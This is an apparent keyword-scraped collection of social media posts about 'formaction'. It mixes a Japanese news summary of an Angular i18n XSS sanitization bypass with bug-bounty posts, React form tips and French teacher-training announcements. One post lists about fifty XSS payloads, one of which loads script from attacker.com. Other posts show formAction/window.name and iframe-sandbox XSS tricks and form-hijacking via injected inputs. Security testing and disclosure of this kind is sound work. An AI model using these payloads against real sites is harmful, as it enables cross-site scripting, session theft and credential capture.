Angularの安全機構に重大な盲点が見つかり、特定条件でスクリプト実行を許す恐れがある。国際化機能と属性指定の組み合わせが原因で、広範なWebアプリが影響を受ける可能性がある。 問題はCVE-2026-32635として追跡されており、Angularのi18n機能とセキュリティ属性の併用時に発生する。hrefやsrcなどの属性に対しi18n-プレフィックスを付与すると、本来動作するサニタイズ処理が回避されることが判明した。 この状態でユーザー入力など未検証データをバインドすると、javascriptスキームなど悪意あるURLがそのまま実行され、クロスサイトスクリプティングが成立する。影響範囲はリンクだけでなく、action、data、formaction、posterなど複数の属性に及ぶ。 攻撃が成功した場合、セッションハイジャックや認証情報の窃取、ユーザーデータの外部送信、不正操作の実行といった深刻な被害が想定される。特にシングルページアプリでは影響が広範囲に及ぶ可能性がある。 影響を受けるのは脆弱バージョンを使用し、未サニタイズ入力を該当属性にバインドし、かつi18n指定している場合に限られる。Angularは既に修正を公開し、複数バージョンでアップデートが提供されている。 開発者は最新バージョンへの更新が推奨されるほか、即時対応できない場合はDomSanitizerによる明示的なサニタイズや、信頼できない入力の直接利用を避ける対策が求められる。 securityonline.info/translat…

🔥 Hunting XSS in 2026? Here are 50 XSS vectors every bug bounty hunter should test. Copy, tweak, fuzz, profit. 💰👇 thexssrat.podia.com/ultimate… <script>alert(1)</script> <img src=x onerror=alert(1)> <svg onload=alert(1)> <body onload=alert(1)> <iframe src=javascript:alert(1)> <math href="javascript:alert(1)">CLICK</math> <details open ontoggle=alert(1)> <video><source onerror=alert(1)> <audio src=x onerror=alert(1)> <object data=javascript:alert(1)> <embed src=javascript:alert(1)> <link rel=stylesheet href=javascript:alert(1)> <form><button formaction=javascript:alert(1)>CLICK</button></form> <input autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <marquee onstart=alert(1)> <isindex type=image src=1 onerror=alert(1)> <meta http-equiv=refresh content="0;url=javascript:alert(1)"> javascript:alert(1) (URL parameter injection) " onmouseover=alert(1) x=" (attribute breakout) '><svg onload=alert(1)> (HTML context breakout) </script><script>alert(1)</script> (script context breakout) -alert(1)- inside JS eval sinks ${alert(1)} (template literal injection) {{constructor.constructor('alert(1)')()}} (AngularJS sandbox escape) "><img src=x onerror=alert(1)> (DOM insertion) location='javascript:alert(1)' setTimeout('alert(1)') Set.constructor('alert(1)')() <svg><animate onbegin=alert(1) attributeName=x dur=1s> <svg><set onbegin=alert(1) attributeName=x> <img src=1 href=1 onerror="javascript:alert(1)"> data:text/html,<script>alert(1)</script> data:image/svg xml,<svg xmlns="w3.org/2000/svg" onload="alert(1)"/> <base href=javascript:alert(1)//> <img src=x:alert(1) onerror=eval(src)> <a href="jAvAsCrIpT:alert(1)">CLICK</a> <a href="javascript:alert(1)">CLICK</a> (URL encoded) <script>alert(1)</script> (HTML encoded) <img src=x onerror=confirm?.(1)> <svg/onload=alert?.(1)> <script>top</script> <img src=x oneonerrorrror=alert(1)> (filter bypass fuzzing) <div style="background-image:url(javascript:alert(1))"> <img srcset="x 1x, javascript:alert(1) 2x"> <script src=//attacker.com/xss.js></script> (external injection) <iframe srcdoc="<script>alert(1)</script>"></iframe> #bugbounty #xss #infosec #pentesting #cybersecurity #appsec #hacking #redteam #wehack #securitytesting

formaction is a standard attribute that be applied to buttons. Buttons are html which servers return. Hope this helps

俺は Server Components の Server Action 抜きが欲しいよ（ コンポーネントの中で await はめっちゃしたいが、formAction を書きたいとは思ってない ）

(app="Next.js" && body="/_next/static/chunks/app/") && body="formaction" This is the fingerprint for CVE-2025-55182.

Leveraging formAction and window.name, inspired by @garethheyes <form><input id="button" onclick="formAction=top.name, type='submit'"></form> <script>document.getElementById("button").click(); window.name="javascript:alert(1)"</script>

🧠 XSS via iframe sandbox escape 1️⃣ App embeds user content in <iframe sandbox> 2️⃣ Sandbox missing allow-scripts or misused 3️⃣ Attacker uses <form><input formaction=javascript:alert(1)> 4️⃣ Click triggers XSS despite sandbox 🎯 Misconfigured sandbox → XSS #bugbounty #xss #iframe

And with a formaction= attribute on a submit button/input you can even rewrite its location:

While collecting some HTML-Injection techniques, I thought of an interesting way to abuse existing <form>s when XSS isn't an option. You can inject <input>s with form= pointing to the form's id= to add params, and make a <button> with form= and formaction= to change its action.

1つの<form>内で複数の遷移先を指定したくて、フォームをネストしようとして少しハマった。。 でも<button formaction="/next">で送信先を分けられると知って解決！ formaction便利すぎる！！ #エンジニア転職 #駆け出しエンジニアと繋がりたい #未経験エンジニア #エンジニア未経験 #Pスク

Aujourd’hui 15journée #FormAction @AgeemAcTlse organisée par 8 départements sur les sciences: lien congrès national Colmar @AGEEM_National : monde des objets le matin avec D.Lagraula Accès Édition

いままで下書きのあるform <form action={createOrdraft}> <ItemField /> <button name=“draft”/> <button name=“create” /> </form> にしてたけど <form > <ItemField /> <button formAction={draft} /> <button formAction={create} /> </form> こっちのがいいとドキュメント読んでて思った

I was implementing two form actions, found this pretty neat feature in React. Use formAction prop

1erRendez-vous #FormAction @AgeemAcTlse le 8 février avec l’intervention de Clemence Gouache sur le décryptage de ses albums ! Il est encore temps d’adhérer à @AGEEM_National! Rejoignez une des 8 sections Ac toulouse! Inscription obligatoire espaceabonne.ageem.org/formu…

Merci d’avoir convié la section AGEEM 82 @AgeemAcTlse à cette #FormAction sur inclusion, EPS… @CornierLaurence @bely_joel @AGEEM_National

Rendez-vous demain après-midi pour le premier temps de form'action autour du développement moteur du jeune enfant de 14h à 16h. #formaction #Ageem93

Des enseignantes de maternelle se sont retrouvées dans la classe d'une adhérente pour un "pedavrac" : présentations et échanges autour de matériels pédagogiques coups de cœur. @AGEEM_National #formaction #pedagogie #echanges #maternelle

@AgeemAcTlse FormAction section Aveyron Conférence @AGEEM_National de F.Carré sur les bienfaits de l’activité physique suivie par parents, enseignants, conseillers pédagogiques avec une gd attention @dsden12

Le 20 nov lors #15aine @AGEEM_National ouverture par IENAdj @seguignes @DSDEN82 puis @reseau_canope 82 et DDS ageem82 CCantagrel de #FormAction : intervention très appréciée de Celine Larpin @AGEEM_National sur #classe_dehors #école_maternelle